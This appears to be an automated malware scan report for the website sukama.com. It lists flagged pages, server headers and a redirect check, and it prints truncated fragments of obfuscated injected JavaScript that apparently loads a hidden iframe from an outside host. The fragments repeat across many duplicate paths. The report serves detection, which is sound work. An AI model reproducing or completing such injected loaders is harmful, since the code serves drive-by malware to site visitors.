Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=sukama.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://sukama.com/ | 200 OK Content-Length: 9039 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,77,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6b,6c,7c,7b,7a,6a,6f,6c,6b,76,6e,6e,6c,68,74,80,35,6b,6c,36,73,6c, Antivirus reports:
| ||
http://sukama.com/./scripts.js | 200 OK Content-Length: 14497 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:70:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:70:68:25:6a:69 Antivirus reports:
| ||
http://sukama.com/./registro.php | 200 OK Content-Length: 4653 Content-Type: text/html | clean |
http://sukama.com/././scripts.js | 200 OK Content-Length: 14497 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:70:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:70:68:25:6a:69 Antivirus reports:
| ||
http://sukama.com/./ | 200 OK Content-Length: 9039 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,77,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6b,6c,7c,7b,7a,6a,6f,6c,6b,76,6e,6e,6c,68,74,80,35,6b,6c,36,73,6c, Antivirus reports:
| ||
http://sukama.com/././registro.php | 200 OK Content-Length: 4653 Content-Type: text/html | clean |
http://sukama.com/./././scripts.js | 200 OK Content-Length: 14497 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:70:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:70:68:25:6a:69 Antivirus reports:
| ||
http://sukama.com/././ | 200 OK Content-Length: 9039 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,77,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6b,6c,7c,7b,7a,6a,6f,6c,6b,76,6e,6e,6c,68,74,80,35,6b,6c,36,73,6c, Antivirus reports:
| ||
http://sukama.com/./././registro.php | 200 OK Content-Length: 4653 Content-Type: text/html | clean |
http://sukama.com/././././scripts.js | 200 OK Content-Length: 14497 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:70:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:70:68:25:6a:69 Antivirus reports:
| ||
http://sukama.com/./././ | 200 OK Content-Length: 9039 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,77,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6b,6c,7c,7b,7a,6a,6f,6c,6b,76,6e,6e,6c,68,74,80,35,6b,6c,36,73,6c, Antivirus reports:
| ||
http://sukama.com/././././registro.php | 200 OK Content-Length: 4653 Content-Type: text/html | clean |
http://sukama.com/./././././scripts.js | 200 OK Content-Length: 14497 Content-Type: application/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) sp="s"+"p"+"li"+"t";w=window;z="dy";d=document;aq="0x";bv=(5-3-1);try{++(d.body)}catch(d21vd12v){vzs=false;try{}catch(wb){vzs=21;}if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:70:68:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:70:68:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:70:68:25:6a:69 Antivirus reports:
| ||
http://sukama.com/././././ | 200 OK Content-Length: 9039 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) if(document.querySelector)zq=4;a=("27,6d,7c,75,6a,7b,70,76,75,27,77,37,40,2f,30,27,82,14,11,27,7d,68,79,27,7a,7b,68,7b,70,6a,44,2e,68,71,68,7f,2e,42,14,11,27,7d,68,79,27,6a,76,75,7b,79,76,73,73,6c,79,44,2e,70,75,6b,6c,7f,35,77,6f,77,2e,42,14,11,27,7d,68,79,27,77,27,44,27,6b,76,6a,7c,74,6c,75,7b,35,6a,79,6c,68,7b,6c,4c,73,6c,74,6c,75,7b,2f,2e,70,6d,79,68,74,6c,2e,30,42,14,11,14,11,27,77,35,7a,79,6a,27,44,27,2e,6f,7b,7b,77,41,36,36,6b,6c,7c,7b,7a,6a,6f,6c,6b,76,6e,6e,6c,68,74,80,35,6b,6c,36,73,6c, Antivirus reports:
| ||
http://sukama.com/./././././registro.php | 200 OK Content-Length: 4653 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: sukama.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 01:15:11 GMT
Pragma: no-cache
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.2.9 with Suhosin-Patch
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=loe15aacbfejn4298vqb2iovj6; path=/
GET / HTTP/1.1
Host: sukama.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Thu, 26 Feb 2015 01:15:11 GMT
Pragma: no-cache
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8g PHP/5.2.9 with Suhosin-Patch
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=loe15aacbfejn4298vqb2iovj6; path=/
Second query (visit from search engine):
GET / HTTP/1.1
Host: sukama.com
Referer: http://www.google.com/search?q=sukama.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: sukama.com
Referer: http://www.google.com/search?q=sukama.com
Result:
The result is similar to the first query. There are no suspicious redirects found.